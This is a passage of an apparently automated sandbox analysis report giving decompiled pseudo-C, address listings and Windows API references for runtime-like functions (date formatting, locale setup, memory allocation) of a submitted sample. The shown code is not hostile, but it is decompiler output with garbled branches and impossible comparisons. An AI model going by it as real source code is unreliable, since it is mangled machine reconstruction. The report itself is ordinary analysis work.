										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
										__eax =  *(__ebp - 0x24);
										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
										goto L109;
									case 3:
										L16:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x28;
										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
										__eax =  *(__ebp - 0x28);
										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
										goto L109;
									case 4:
										L17:
										E00408974(__ebp) = E004089A0(__ebp);
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
										if(__eflags < 0) {
											__eax =  *(__ebp + 8);
											__eax =  *(__ebp - 0x10) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
											} else {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											}
										}
										goto L109;
									case 5:
										L23:
										E00408974(__ebp) =  *(__ebp - 0xc);
										__eax =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags = __eax;
										if(__eflags < 0) {
											E004089A0(__ebp) =  *(__ebp + 8);
											__eax =  *(__ebp - 0x12) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eflags == 0) {
													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
												} else {
													__eax = __eax - 1;
													__eflags = __eax;
													if(__eax == 0) {
														__eax =  *(__ebp + 8);
														__eax =  *0x454684; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													} else {
														__eax =  *(__ebp + 8);
														__eax =  *0x454688; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													}
												}
											}
										}
										goto L109;
									case 6:
										L33:
										__eax = E00408974(__ebp);
										__eax = E004089D8(__ebp);
										 *(__ebp - 0x1f) = 0;
										__esi =  *(__ebp - 4);
										while(1) {
											L52:
											__al =  *__esi;
											__eflags =  *__esi;
											if( *__esi == 0) {
												break;
											}
											L34:
											__eax = __eax & 0x000000ff;
											__eflags = __eax;
											asm("bt [0x419108], eax");
											if(__eax >= 0) {
												L36:
												__eax = 0;
												__al =  *__esi;
												__eflags = 0 - 0x48;
												if(0 > 0x48) {
													L42:
													__eax = 0xffffffffffffff9f;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														L45:
														__eflags =  *(__ebp - 0x1f);
														if( *(__ebp - 0x1f) != 0) {
															L51:
															__esi = __esi + 1;
															__eflags = __esi;
															continue;
														}
														L46:
														__edx = 0x409418;
														__ecx = 5;
														__eax = __esi;
														__eax = E004077C0(__esi, 5, 0x409418);
														__eflags = __eax;
														if(__eax == 0) {
															L49:
															 *((char*)(__ebp - 0x1e)) = 1;
															break;
														}
														L47:
														__edx = 0x409420;
														__ecx = 3;
														__eax = __esi;
														__eax = E004077C0(__esi, 3, 0x409420);
														__eflags = __eax;
														if(__eax == 0) {
															goto L49;
														}
														L48:
														__edx = 0x409424;
														__ecx = 4;
														__eax = __esi;
														__eax = E004077C0(__esi, 4, 0x409424);
														__eflags = __eax;
														if(__eax != 0) {
															break;
														}
														goto L49;
													}
													L43:
													__eax = 0xffffffffffffff98;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														break;
													}
													L44:
													goto L51;
												}
												L37:
												if(0 == 0x48) {
													break;
												}
												L38:
												__eax = 0xffffffffffffffde;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													L50:
													__al =  *(__ebp - 0x1f);
													__al =  *(__ebp - 0x1f) ^ 0x00000001;
													__eflags = __al;
													 *(__ebp - 0x1f) = __al;
													goto L51;
												}
												L39:
												__eax = 0xffffffffffffffd9;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L50;
												}
												L40:
												__eax = 0xffffffffffffffbf;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L45;
												}
												L41:
												goto L51;
											} else {
												__eax = __esi;
												__eax = E0040B044(__esi);
												__esi = __eax;
												continue;
											}
										}
										L53:
										__ax =  *((intOrPtr*)(__ebp - 0x16));
										__eflags =  *((char*)(__ebp - 0x1e));
										if( *((char*)(__ebp - 0x1e)) != 0) {
											__eflags = __ax;
											if(__ax != 0) {
												__eflags = __ax - 0xc;
												if(__ax > 0xc) {
													__ax = __ax - 0xc;
													__eflags = __ax;
												}
											} else {
												__ax = 0xc;
											}
										}
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__edx =  *(__ebp + 8);
										__eax = __ax & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 7:
										L61:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x18) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 8:
										L64:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 9:
										L67:
										__eax = E00408974(__ebp);
										__eflags =  *(__ebp - 0xc) - 1;
										if( *(__ebp - 0xc) != 1) {
											__eax =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										} else {
											__eax =  *(__ebp + 8);
											__eax =  *0x454698; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										}
										goto L109;
									case 0xa:
										L70:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 3;
										if( *(__ebp - 0xc) > 3) {
											 *(__ebp - 0xc) = 3;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 0xb:
										goto L0;
									case 0xc:
										L90:
										E00408974(__ebp) =  *(__ebp + 8);
										__eax =  *0x454684; // 0x0
										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										__eax = E004089D8(__ebp);
										__eflags =  *((short*)(__ebp - 0x16));
										if( *((short*)(__ebp - 0x16)) != 0) {
											L93:
											 *(__ebp + 8) = 0x409438;
											__edx = 1;
											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
											goto L109;
										}
										L91:
										__eflags =  *(__ebp - 0x18);
										if( *(__ebp - 0x18) != 0) {
											goto L93;
										}
										L92:
										__eflags =  *(__ebp - 0x1a);
										if( *(__ebp - 0x1a) == 0) {
											goto L109;
										}
										goto L93;
									case 0xd:
										L94:
										__eflags =  *0x454681;
										__eflags = __eax - 0x454681;
										 *__edi =  *__edi + __cl;
										__eflags =  *(__ecx - 0x75000000) & __bl;
									case 0xe:
										L97:
										__eflags =  *0x45468c;
										__eflags = __eax - 0x45468c;
										_t136 = __edi + __esi * 2 - 0x75;
										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
										__eflags =  *_t136;
									case 0xf:
										L100:
										__esi =  *(__ebp - 4);
										while(1) {
											L104:
											__eax =  *(__ebp - 4);
											__al =  *__eax;
											__eflags = __al;
											if(__al == 0) {
												break;
											}
											L105:
											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
												L101:
												__eax = __eax & 0x000000ff;
												__eflags = __eax;
												asm("bt [0x419108], eax");
												if(__eax >= 0) {
													_t146 = __ebp - 4;
													 *_t146 =  *(__ebp - 4) + 1;
													__eflags =  *_t146;
												} else {
													__eax =  *(__ebp - 4);
													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
												}
												continue;
											}
											break;
										}
										L106:
										__eax =  *(__ebp + 8);
										__edx =  *(__ebp - 4);
										__edx =  *(__ebp - 4) - __esi;
										__esi = E004088C4(__edx,  *(__ebp + 8));
										__eax =  *(__ebp - 4);
										__eflags =  *__eax;
										if( *__eax != 0) {
											 *(__ebp - 4) =  *(__ebp - 4) + 1;
										}
										goto L109;
								}
							} else {
								__eflags = _t181 - 0x4d;
								if(_t181 == 0x4d) {
									__eflags = _t232 - 0x48;
									if(_t232 == 0x48) {
										_t181 = 0x4e;
									}
								}
								L9:
								_t232 = _t181;
								goto L10;
							}
						} else {
							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t232 = 0x20;
							continue;
						}
					}
					L110:
					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
					_pop(_t272);
					 *[fs:eax] = _t272;
					_push(E00409410);
					return E00403EAC(_t282 - 0x28, 2);
				}
			}

















    0x00409161
    0x00409161
    0x00409161
    0x00409162
    0x0040916b
    0x0040917f
    0x004091b5
    0x004091ba
    0x004091bc
    0x004091f2
    0x004091f7
    0x004091f9
    0x0040923b
    0x00409240
    0x00409242
    0x00409282
    0x00409287
    0x00409289
    0x004092c9
    0x0040928b
    0x0040928c
    0x00409291
    0x004092ae
    0x004092b4
    0x004092b4
    0x00409244
    0x00409245
    0x0040924a
    0x00409267
    0x0040926d
    0x0040926d
    0x004091fb
    0x004091fb
    0x00409200
    0x00409217
    0x0040921c
    0x00409202
    0x00409206
    0x0040920b
    0x00409210
    0x00409222
    0x00409226
    0x00409226
    0x004091be
    0x004091be
    0x004091c3
    0x004091c5
    0x004091c5
    0x004091d3
    0x004091d9
    0x004091dd
    0x004091dd
    0x00409181
    0x00409181
    0x00409186
    0x00409188
    0x00409188
    0x00409188
    0x0040918b
    0x0040918f
    0x00409194
    0x00409196
    0x0040919c
    0x004091a0
    0x004091a0
    0x004093d8
    0x004093d8
    0x004093db
    0x004093df
    0x00000000
    0x00000000
    0x00408cdf
    0x00408cdf
    0x00408cea
    0x00408cf1
    0x00408d24
    0x00408d27
    0x00408d2f
    0x00408d32
    0x00408d34
    0x00408d34
    0x00408d34
    0x00408d36
    0x00408d3b
    0x00408d3e
    0x00408d4d
    0x00408d52
    0x00408d55
    0x00408d58
    0x004093c6
    0x004093d2
    0x00000000
    0x004093d7
    0x00408d5e
    0x00408d64
    0x00000000
    0x00000000
    0x00000000
    0x00408de4
    0x00408de5
    0x00408dec
    0x00408df2
    0x00408df6
    0x00408e28
    0x00408df8
    0x00408e10
    0x00408e15
    0x00000000
    0x00000000
    0x00408e33
    0x00408e3b
    0x00408e41
    0x00408e46
    0x00408e4c
    0x00408e52
    0x00408e55
    0x00000000
    0x00000000
    0x00408e60
    0x00408e68
    0x00408e6e
    0x00408e73
    0x00408e79
    0x00408e7f
    0x00408e82
    0x00000000
    0x00000000
    0x00408e8d
    0x00408e95
    0x00408e9e
    0x00408e9f
    0x00408e9f
    0x00408ea2
    0x00408ea8
    0x00408eac
    0x00408eb0
    0x00408eb3
    0x00408ea4
    0x00408ea4
    0x00408ec2
    0x00408ec6
    0x00408ecd
    0x00408ea6
    0x00408edc
    0x00408ee0
    0x00408ee7
    0x00408eec
    0x00408ea4
    0x00000000
    0x00000000
    0x00408ef2
    0x00408ef9
    0x00408efc
    0x00408efd
    0x00408efd
    0x00408f00
    0x00408f13
    0x00408f17
    0x00408f1b
    0x00408f1e
    0x00408f02
    0x00408f02
    0x00408f3b
    0x00408f3e
    0x00408f45
    0x00408f04
    0x00408f04
    0x00408f04
    0x00408f05
    0x00408f62
    0x00408f65
    0x00408f6c
    0x00408f07
    0x00408f07
    0x00408f07
    0x00408f08
    0x00408f77
    0x00408f7b
    0x00408f80
    0x00408f0a
    0x00408f8b
    0x00408f8f
    0x00408f94
    0x00408f99
    0x00408f08
    0x00408f05
    0x00408f02
    0x00000000
    0x00000000
    0x00408f9f
    0x00408fa0
    0x00408fa7
    0x00408fad
    0x00408fb1
    0x0040904e
    0x0040904e
    0x0040904e
    0x00409050
    0x00409052
    0x00000000
    0x00000000
    0x00408fb9
    0x00408fb9
    0x00408fb9
    0x00408fbe
    0x00408fc5
    0x00408fd2
    0x00408fd2
    0x00408fd4
    0x00408fd6
    0x00408fd9
    0x00408fee
    0x00408fee
    0x00408fee
    0x00408ff1
    0x00408ffa
    0x00408ffa
    0x00408ffe
    0x0040904d
    0x0040904d
    0x0040904d
    0x00000000
    0x0040904d
    0x00409000
    0x00409000
    0x00409005
    0x0040900a
    0x0040900c
    0x00409011
    0x00409013
    0x0040903f
    0x0040903f
    0x00000000
    0x0040903f
    0x00409015
    0x00409015
    0x0040901a
    0x0040901f
    0x00409021
    0x00409026
    0x00409028
    0x00000000
    0x00000000
    0x0040902a
    0x0040902a
    0x0040902f
    0x00409034
    0x00409036
    0x0040903b
    0x0040903d
    0x00000000
    0x00000000
    0x00000000
    0x0040903d
    0x00408ff3
    0x00408ff3
    0x00408ff3
    0x00408ff6
    0x00000000
    0x00000000
    0x00408ff8
    0x00000000
    0x00408ff8
    0x00408fdb
    0x00408fdb
    0x00000000
    0x00000000
    0x00408fdd
    0x00408fdd
    0x00408fdd
    0x00408fe0
    0x00409045
    0x00409045
    0x00409048
    0x00409048
    0x0040904a
    0x00000000
    0x0040904a
    0x00408fe2
    0x00408fe2
    0x00408fe2
    0x00408fe5
    0x00000000
    0x00000000
    0x00408fe7
    0x00408fe7
    0x00408fe7
    0x00408fea
    0x00000000
    0x00000000
    0x00408fec
    0x00000000
    0x00408fc7
    0x00408fc7
    0x00408fc9
    0x00408fce
    0x00000000
    0x00408fce
    0x00408fc5
    0x00409058
    0x00409058
    0x0040905c
    0x00409060
    0x00409062
    0x00409065
    0x0040906d
    0x00409071
    0x00409073
    0x00409073
    0x00409073
    0x00409067
    0x00409067
    0x00409067
    0x00409065
    0x00409077
    0x0040907b
    0x0040907d
    0x0040907d
    0x00409084
    0x00409088
    0x0040908b
    0x0040908e
    0x00000000
    0x00000000
    0x00409099
    0x004090a1
    0x004090a7
    0x004090ab
    0x004090ad
    0x004090ad
    0x004090b4
    0x004090b8
    0x004090bc
    0x004090bf
    0x00000000
    0x00000000
    0x004090ca
    0x004090d2
    0x004090d8
    0x004090dc
    0x004090de
    0x004090de
    0x004090e5
    0x004090e9
    0x004090ed
    0x004090f0
    0x00000000
    0x00000000
    0x004090fb
    0x004090fc
    0x00409102
    0x00409106
    0x0040911c
    0x00409120
    0x00409125
    0x00409108
    0x00409108
    0x0040910c
    0x00409111
    0x00409116
    0x00000000
    0x00000000
    0x00409130
    0x00409138
    0x0040913e
    0x00409142
    0x00409144
    0x00409144
    0x0040914b
    0x0040914f
    0x00409153
    0x00409156
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004092d4
    0x004092db
    0x004092df
    0x004092e4
    0x004092eb
    0x004092f1
    0x004092f6
    0x0040930a
    0x0040930e
    0x00409313
    0x0040931e
    0x00409322
    0x00409327
    0x00000000
    0x0040932c
    0x004092f8
    0x004092f8
    0x004092fd
    0x00000000
    0x00000000
    0x004092ff
    0x004092ff
    0x00409304
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00409332
    0x00409332
    0x00409333
    0x00409338
    0x0040933a
    0x00000000
    0x00409358
    0x00409358
    0x00409359
    0x0040935e
    0x0040935e
    0x0040935e
    0x00000000
    0x00409377
    0x00409377
    0x0040939a
    0x0040939a
    0x0040939a
    0x0040939d
    0x0040939f
    0x004093a1
    0x00000000
    0x00000000
    0x004093a3
    0x004093a3
    0x004093a6
    0x0040937c
    0x0040937c
    0x0040937c
    0x00409381
    0x00409388
    0x00409397
    0x00409397
    0x00409397
    0x0040938a
    0x0040938a
    0x00409392
    0x00409392
    0x00000000
    0x00409388
    0x00000000
    0x004093a6
    0x004093a8
    0x004093a8
    0x004093ac
    0x004093af
    0x004093b3
    0x004093b9
    0x004093bc
    0x004093bf
    0x004093c1
    0x004093c1
    0x00000000
    0x00000000
    0x00408d40
    0x00408d40
    0x00408d42
    0x00408d44
    0x00408d47
    0x00408d49
    0x00408d49
    0x00408d47
    0x00408d4b
    0x00408d4b
    0x00000000
    0x00408d4b
    0x00408cf3
    0x00408d04
    0x00408d12
    0x00408d15
    0x00000000
    0x00408d15
    0x00408cf1
    0x004093e5
    0x004093e8
    0x004093f0
    0x004093f3
    0x004093f6
    0x00409408
    0x00409408

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040D920, Relevance: 6.1, APIs: 4, Instructions: 115
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040C9FC();
							E0040D7EC(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040CA04();
							E0040D7EC(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0040D8C4(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0040D894(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040CA0C();
						E0040D7EC(_v780);
						E0040DB18(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040C598();
				return E0040D7EC(_v776);
			}






















    0x0040d92c
    0x0040d93c
    0x0040d943
    0x0040d943
    0x0040d94e
    0x0040d95c
    0x0040d96b
    0x0040d989
    0x0040d96d
    0x0040d978
    0x0040d978
    0x0040d998
    0x0040d9a4
    0x0040d9a7
    0x0040d9a9
    0x0040d9aa
    0x0040d9ac
    0x0040d9b2
    0x0040d9b4
    0x0040d9c3
    0x0040d9c4
    0x0040d9ce
    0x0040d9cf
    0x0040d9d4
    0x0040d9df
    0x0040d9e0
    0x0040d9ea
    0x0040d9eb
    0x0040d9f0
    0x0040da0b
    0x0040da0d
    0x0040da0e
    0x0040da11
    0x0040da11
    0x0040d9b2
    0x0040da1a
    0x0040da1d
    0x0040da1f
    0x0040da20
    0x0040da26
    0x0040da2c
    0x0040da2e
    0x0040da30
    0x0040da33
    0x0040da36
    0x0040da36
    0x0040da39
    0x00000000
    0x00000000
    0x00000000
    0x0040da39
    0x0040da39
    0x0040da40
    0x0040da4b
    0x0040da53
    0x0040da5a
    0x0040da61
    0x0040da62
    0x0040da67
    0x0040da72
    0x0040da72
    0x0040da80
    0x0040da84
    0x0040da8a
    0x0040da8b
    0x0040da9b

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040B3A0, Relevance: 6.1, APIs: 4, Instructions: 95
    C-Code - Quality: 100%
    			E0040B3A0() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x454738 = 0x409;
				 *0x45473c = 9;
				 *0x454740 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x454738 = _t14;
				}
				if(_t14 != 0) {
					 *0x45473c = _t14 & 0x3ff;
					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x419108, 0x40b4f4, 8 << 2);
				if( *0x4190c0 != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x454744 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040B328(__eflags, _t49);
					}
				} else {
					_t20 = E0040B388();
					if(_t20 != 0) {
						 *0x454745 = 0;
						 *0x454744 = 0;
						return _t20;
					}
					E0040B328(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x454744 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x454745 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x454738; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x454745 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















    0x0040b3ac
    0x0040b3b6
    0x0040b3c0
    0x0040b3ca
    0x0040b3d1
    0x0040b3d3
    0x0040b3d3
    0x0040b3db
    0x0040b3e7
    0x0040b3f3
    0x0040b3f3
    0x0040b407
    0x0040b410
    0x0040b4bf
    0x0040b4c4
    0x0040b4c9
    0x0040b4d0
    0x0040b4d5
    0x0040b4d7
    0x0040b4da
    0x0040b4e0
    0x0040b4e2
    0x00000000
    0x0040b4ea
    0x0040b416
    0x0040b416
    0x0040b41d
    0x0040b41f
    0x0040b426
    0x00000000
    0x0040b426
    0x0040b433
    0x0040b443
    0x0040b445
    0x0040b44a
    0x0040b44d
    0x0040b453
    0x0040b455
    0x0040b457
    0x00000000
    0x0040b457
    0x0040b463
    0x0040b468
    0x0040b46e
    0x0040b46e
    0x0040b470
    0x0040b471
    0x0040b472
    0x0040b472
    0x0040b48e
    0x0040b494
    0x0040b499
    0x0040b49e
    0x0040b4a4
    0x0040b4a4
    0x0040b4a8
    0x0040b4ab
    0x0040b4b1
    0x0040b4b3
    0x00000000
    0x00000000
    0x0040b4b5
    0x0040b4b8
    0x0040b4b8
    0x0040b4b9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040b4b9
    0x0040b4a4
    0x0040b4f1
    0x0040b4f1
    0x00000000

    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040152C, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E0040137C(0x4545e4, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









    0x00401530
    0x00401532
    0x00401534
    0x00401536
    0x0040154a
    0x0040154f
    0x00401551
    0x00401555
    0x0040155d
    0x00401563
    0x0040156f
    0x00401574
    0x00401574
    0x00401579
    0x00401582
    0x00401589
    0x00401595
    0x0040159c
    0x00000000
    0x0040159c
    0x00401589
    0x004015a2

    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00405E00, Relevance: 6.0, APIs: 4, Instructions: 11
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





    0x00405e03
    0x00405e0a
    0x00405e0f
    0x00405e15
    0x00405e1a

    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
